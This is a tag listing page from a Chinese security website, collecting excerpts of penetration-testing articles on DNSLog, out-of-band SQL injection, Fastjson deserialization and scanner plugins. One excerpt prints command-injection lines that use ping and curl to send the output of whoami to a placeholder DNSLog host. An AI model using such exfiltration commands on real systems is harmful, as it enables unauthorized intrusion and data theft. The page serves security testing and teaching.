dnslog - 第 13 | CN-SEC 中文网

代码审计

Fastjson：我一路向北，离开有你的季节（上）

点击上方“蓝字”，关注更多精彩介绍Fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到Ja...

03月07日63 views评论

阅读全文

安全工具

DNSLog服务器自建

前置条件：1.阿里云域名一个，例如 xxx.com2.公网服务器一个, 例如 1.2.3.4步骤：1.进入域名控制台，添加A记录并指向公网IP,添加两个NS记录指向添加的A记录2.创建2个自定义DNS...

03月07日134 views评论

阅读全文

安全闲碎

技术 | 关于Antenna的隐匿性部署

01前言Antenna项目：https://github.com/wuba/Antenna使用文档：http://blog.antenna.cool/docs/introAntenna当前已经提供了白...

03月04日34 views评论

阅读全文

安全文章

关于Antenna的隐匿性部署

01前言Antenna项目：https://github.com/wuba/Antenna使用文档：http://blog.antenna.cool/docs/introAntenna当前已经提供了白...

03月03日69 views评论

阅读全文

安全文章

【渗透测试】MSSQL盲注实战

0x01 前言在渗透测试中很多时候会遇到无报错回显的情况，除了一个个猜解以外，还可以结合DNSlog来快速获取数据库信息，本文主要介绍在MSSQL数据库下的DN...

02月21日197 views评论

阅读全文

安全工具

多功能BurpSuite漏洞探测插件—TsojanScan

TsojanScan 一个集成的BurpSuite漏洞探测插件 First 本着市面上各大漏洞探测插件的功能比较单一，因此与TsojanSecTeam成员决定在已有框架的基础上修改并增加常用的漏洞探...

02月15日350 views评论

阅读全文

安全文章

自建DNSLog平台

0x00 前言有时候网上一些常用的DNSLog平台可能会被目标站点黑名单过滤掉，此时就可以自建DNSLog平台来应对这种情况了。0x01 自建DNSLog平台本次使用一个域名的方式来搭建，而非网上大多...

01月28日309 views评论

阅读全文

安全文章

渗透测试-DNSLOG使用技巧

0x01 命令执行场景 Liunx/Unix/Mac OS系统:ping `whoami`.mydnslog.comcurl http://mydnslog.com/`whoami...

01月25日65 views评论

阅读全文

安全文章

实战记录之曲线救国

记录一次实战稍曲折拿下目标站点的过程。前期摸点IIS7.0+ASP.NET的组合，简单尝试发现前台登录页面可能存在SQL注入，数据包如下：为了节约时间直接祭出sqlmap，-r x.txt -v 3 ...

01月17日180 views已关闭评论

阅读全文

安全文章

利用DNS实现SQL注入带外查询（OOB）

根据用于数据检索的传输信道，SQLi可分为三个独立的类别：inference（经典SQL注入）,inband（盲注、推理注入、带内注入）和out-of-band一、什么是OOBout-of-band带...

01月04日123 views评论

阅读全文

安全工具

这个DNSLOG是我见过最好用的

兄弟们，发现一个贼好用的神器。这个DNSLOG是我见过最好用的域名是DDDD.CAM凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑...

12月31日121 views评论

阅读全文

安全文章

使用 Fuzztag 一键爆破反序列化链

背景 Yakit 新增的 Yso-Java-Hack 功能可以让我们生成反序列化利用的 payload ，通过图形化的方式简化了生成 payload 的过程，但发包过程由于需要针对不同的目标...

12月23日123 views评论

阅读全文

Fastjson：我一路向北，离开有你的季节（上）

DNSLog服务器自建

技术 | 关于Antenna的隐匿性部署

关于Antenna的隐匿性部署

【渗透测试】MSSQL盲注实战

多功能BurpSuite漏洞探测插件—TsojanScan

自建DNSLog平台

渗透测试-DNSLOG使用技巧

实战记录之曲线救国

利用DNS实现SQL注入带外查询（OOB）

这个DNSLOG是我见过最好用的

使用 Fuzztag 一键爆破反序列化链

在线咨询

微信